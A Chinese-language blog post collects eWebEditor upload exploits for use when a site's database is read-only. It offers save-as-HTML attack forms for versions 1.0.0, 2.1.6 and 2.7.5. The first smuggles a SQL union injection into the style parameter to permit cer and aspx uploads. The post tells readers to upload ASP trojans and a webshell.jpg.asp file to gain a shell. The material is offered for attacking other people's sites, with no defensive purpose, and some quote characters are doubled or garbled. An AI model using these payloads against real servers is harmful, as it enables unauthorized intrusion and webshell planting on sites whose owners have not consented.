大家经常会遇到存在ewebeditor但是却没有办法更新样式的情况,这往往是由于管理员为了安全把数据库设置为了只读。就算是只读我们也有办法突破。理论上只要条件符合并且数据库一样就可以利用,并不一定要求版本号完全一致。
下面按照版本号分别阐述,将代码保存为htm文件即可利用:
1、ewebeditor 1.0.0 上传漏洞:这个是仿照冰的原点的exp写的。
<H1>ewebeditor asp版 1.0.0 上传漏洞利用程序—-By HCocoa</H1><br><br>
<form action=”http://要上传的地址/ewebeditor/upload.asp?action=save&type=IMAGE& amp;style=hcocoa’ union select S_ID,S_Name,S_Dir,S_EditorHeader,S_Body,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b’|cer|aspx’,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord from ewebeditor_style where s_name=’standard’and’a'=’a” method=post name=myform enctype=”multipart/form-data”>
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
2、ewebeditor 2.1.6 上传漏洞:这个还是冰的原点写的,网上遍地都有:
<HTML><HEAD><TITLE>ewebeditor的upload文件上传 exp</TITLE><meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″> </head><body bgcolor=orange>
ewebeditor的upload文件上传 exp
不是通杀,版本有区别!我就郁闷,落叶那JJ说文章没说清楚,这份EXP就是根据文章写出来的!落叶那家伙的EXP我看半天没看明白有啥区别!<br />
文件传到了uploadfile目录下了。不知道算不算0day
至于利用方法就是修改源文件中的action,然后传cer的马马就行了!
<form action=””http://要上传的网址/ewebeditor/upload.asp?action=save& type=IMAGE&” enctype=””multipart/form-data”” method=”post”>
<input style=””width: 100%”;” name=”uploadfile” size=”100″ type=”file” />
<input type=”submit” value=”传吧” /></form>
3、ewebeditor 2.7.5 上传漏洞:这个用在修改了可以上传asa但是提示没有工具栏的情况下,作者不详。
<form action=””http://要上传的网址/ewebedit/upload.asp?action=save&type=& amp;amp;” enctype=””multipart/form-data”” method=”post”><input style=””width: 100%”;” name=”uploadfile” size=”1″ type=”file” /><input type=”submit” value=””上传了”” /></form>
4、ewebeditor 2.8.0 上传漏洞:前提要开启远程上传,然后传一个webshell.jpg.asp即可,查看源代码即可获得shell地址。
One Response 至“”数据库只读时eWebEditor的上传漏””
这个以前我遇到过,呵呵!看到解决办法了!